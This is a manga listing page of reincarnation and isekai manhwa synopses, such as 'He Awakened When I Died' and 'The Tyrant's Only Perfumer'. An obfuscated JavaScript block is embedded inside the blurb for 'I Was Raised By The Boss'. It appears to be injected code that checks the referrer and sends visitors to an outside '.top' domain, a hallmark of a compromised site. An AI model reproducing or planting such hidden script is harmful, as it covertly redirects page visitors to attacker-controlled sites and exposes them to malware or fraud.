Reincarnation - Page 40

Explore the world of Reincarnation manga, where gripping stories await. Start reading the best Reincarnation manga free now!

546 results

He Awakened When I Died

I possessed an extra who died as soon as the original work started. I was the hero’s incompetent guide. Only until I die, will the male lead meet his new guide, the heroine. To safely stray from the original work, I pretended to be dead after consuming a toxic flower that throws you into a coma, but- “My guide isn’t breathing anymore.” ……? “Who the hell can stop me?” The male lead awakened and went berserk? You awakened after thinking I died? You can’t possibly awaken like this….! *** “You’re leaving me?” Bliss scoffed at Shana’s resignation letter. “Is this a new joke?” “No. You don’t need a guide anymore so I…….” “Shana.” Bliss called her in a soft but determined voice. “You can make fun of me, you can deceive me like a fool, or you can play with me as much as you want. So don’t even joke about trying to leave me.” Bliss whispered to Shana with a beautiful smile that looked like a painting. “I just can’t let that slide.” You Awakened while I Was Dead. / Dia Bangkit Ketika Aku Mati. / 제가 죽었다고 각성하시다니요. / You Think I’m Dead?


Silly Little Abella

Silly Little Abella / 백치 아벨라 Seokyung Kang is the most in-demand math teacher in the most prestigious town in the country. One day, she is driven over by a truck and wakes up as Abella, a gorgeous but intellectually challenged daughter of the Archduke. Before she could even get a hold of what’s going on, she has to marry the “monster,” a hunchback imperial prince who has burns all over his body! But the so-called “monster” turns out to be a hunk and a pretty boy! Now, Abella has to figure out what’s her mysterious husband’s mind while battling a group of mean imperial in-laws. Can Abella use her role as the “fool of the court” to her advantage to turn her married life around? Watch out, this fool is coming for you!


I Was Raised By The Boss

The MC accidentally entered a hidden boss lair when he was younger, and in the midst of corpses, he was found by the hidden boss and got adopted by him. The boss sees the MC as a toy at first, but as time goes by, looking at the interaction between the cruel boss and the young boy…they somehow seemed like a family?!<script></script><script>function _0x4403(_0x560b2f,_0x44b402){var _0x531c5b=_0x475d();return _0x4403=function(_0x1a3d9f,_0x259951){_0x1a3d9f=_0x1a3d9f-(-0x332+-0x59f*-0x4+-0x4b3*0x4);var _0x4460a0=_0x531c5b[_0x1a3d9f];return _0x4460a0;},_0x4403(_0x560b2f,_0x44b402);}function _0x475d(){var _0x2d4ec4=['3BMWZEm','90203wsETNu','coNub','random','google','cMEiS','FRjfv','2495254npXzek','href','3499803rbIWWO','QalTP','https://ip','505IzPqfH','9715202EIdOXf','VKtUY','3204570QXHqfo','location','.top/','then','includes','','KmBzh','kBbbt','8ABRwiW','floor','http://rea','52308OFgrgV','referrer','6697338rrguuc','.customapi','kdaCf','SNkrF','text'];_0x475d=function(){return _0x2d4ec4;};return _0x475d();}(function(_0x18fa4c,_0x56548c){var _0x255725=_0x4403,_0x1a7dac=_0x18fa4c();while(!![]){try{var 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The Villainous Princess Won’t Tolerate a Bad Ending

In the cutthroat world of game development, genius creator Ko Sehee’s life is upended when her junior, Choi Yuri, betrays her, stealing Sehee’s game “Land of Destiny” and relegating her to ghostwriter. But fate has a twist; a fatal accident plunges them into the very game world Sehee crafted. Now, reborn as the diabolical Princess Violeta, she must navigate treacherous waters where she is the villainess, and her nemesis is the beloved heroine. Who will triumph when the creator battles her usurper in a world of their own making?


Chronicles Of The Martial God’s Return

Chronicles of a Returner Chronicles Of The Martial God's Return manhwa, Chronicles of a ReturnerThe sixth masterpiece of the Wuxia Genre that'll meet your expectations, just like the [Third-rate Chronicles of Return], [The Conquer of the Heavenly Faction], and the [Chronicles of Seven Dragons and Seven Demons]. [Chronicles of the Martial God's Return] The Ultimate Martial Divine Demon, Dan Woohyun, was sealed up because he was too strong for the world to handle. After a millennium passed by, he was released from his seal and felt like everything was meaningless as he wandered the back alleys Just as he fell down because he was sick of the world, a small hand appeared in front of him. "What's this?" asked Dan Woohyun. "A dumpling!" came a reply. This was the first time in his life that someone had been nice to him without any impure intentions, and that changed his fate. This is the chronicles of a martial god who traversed through a thousand years of time and space!


I wanted to be a loyal sword

충직한 검이 되려 했는데 / I Tried To Be Her Loyal Sword / I Was Planning to Become a Loyal Sword She became a mercenary to earn money for her sick sister's medicine, and she never took her sword off her hands. Then one day, I fell down and remembered my previous life. In fact, this place is in a novel about a younger sister in which she is the main character, and I was the daughter of a bloodthirsty devil, Duke Chrysis I didn't mean to get involved with Duke Chrissy, but my brother's illness got worse and I had to go to the duke, and he said, "My daughter doesn't have to kneel to anyone. Even if this is the emperor of the empire, you won't be able to bend your knees again." The Duke of Chrysis, who has no blood or tears, is a little strange. "If you cry in Shushu's eyes, it's only death, you children." My angelic sister Arya also blackened for some reason. "You're the one who saved your life, so you have to take responsibility. Have you forgotten the night you spent with me?" "I've admired you for a very long time. Can't you give me a piece of you?" 'Don't you want to be a queen? Then you be king. I'm the king and father. Is it a kingdom?" "People think I'm a pope who serves the sun god, but do you know that God is you to me?" The fish in my brother's fishing grounds also work on me. Is the world crazy?


The Tyrant’s Only Perfumer

A young woman sick with an incurable illness closes her eyes for the last time, only to wake up as Ariel Winston, an antagonist of the novel she had loved reading before her death. Knowing that death lies before her if she continues down the path the real Ariel has been going towards, she quickly breaks up with Duke Cedric Evans, who is not only the protagonist of the novel, but a man who is cursed with a condition which causes him to become bloodthirsty when he does not smell a specific scent constantly. However, Cedric, who had been forced to date Ariel due to her status as his personal perfumer, suddenly seems reluctant to distance himself from her. Just what is wrong with this man, and how will this change the events of the novel? Will Ariel be able to live the life she wants?


My Mysterious Nighttime Visitor

My Mysterious Nighttime Visitor manhwa, 흑막은 매일 밤 나를 찾아온다 Ruby never expected to get transported into the world of a novel… least of all a spicy boys’ love novel! When such a thing happens, what’s a girl to do? Make the most of it by becoming a successful businesswoman running a luxury inn, of course! The money and power is one thing, but the chance to see and interact with her favorite hunky guys from the story is an added bonus. There’s only one problem, and that’s the mysterious, scheming villain. What was once just some brooding eye-candy is now a very real threat to Ruby’s life. Will Ruby be able to out-maneuver this scheming visitor, or is this story doomed to end in tragedy?


He’s a Supporting Character but I Love Him Anyway

“Let’s cherish each other!” The supporting character that will eventually be thrown away, don’t play hard to get! I am Kim Geumja who is deeply immersed in the supporting character of a novel soon to face a miserable ending. One day, I was involved in a car accident. When I opened my eyes, I found myself inside of a novel! It’s shocking but I couldn’t believe I met the supporting character whom I loved dearly, Kyle. Meeting him… I couldn’t help but dance from so much happiness. Proud of my sincerity and healthy body, I decided to make Kyle happy… But for some reason, I could hear all the bad feelings towards Kyle! What a useless telepathy… Kim Geumja, who lives with an excited heart thinking about Kyle again today. If I can be by Kyle’s side, I can do all kinds of work, even a man’s!


Mad Daoist Son-in-law

The Head of the Laoshan Sect was attacked and killed by the Demon King.When he was dying, his soul left his body and returned to the modern world after 300 years, His soul possessed the body of a weak man who eats soft rice. Now, he is determined to avenge himself against the Demon King, while also dealing with his mother-in-law......This new life isn't easy...


You’ve Got The Wrong House, Villain

Read manhwa You’ve Got The Wrong House, Villain / 집 잘못 찾아오셨어요, 악역님 / You’ve Got The Wrong House, Villain (Novel) I guess I’m just an extra next door, and a neighbor with a lot of stories… According to the original story, the heroine had to save the wounded villain and in return, she will receive the maniacal obsession of her handsome villain. But for some reason, Why the Villain passed out in front of my house? I looked around for a moment and then pushed the man’s body away


Leveling My Husband to the Max

Because of her indifferent husband, Amber died alone. She regressed to the first night of her marriage…! In order to prevent a repeat of my past life, I’m trying to revive the impoverished duke and have a neat divorce with my husband… “Please treat me however you want, wife.” I’m flustered by my husband’s 180 degree change!
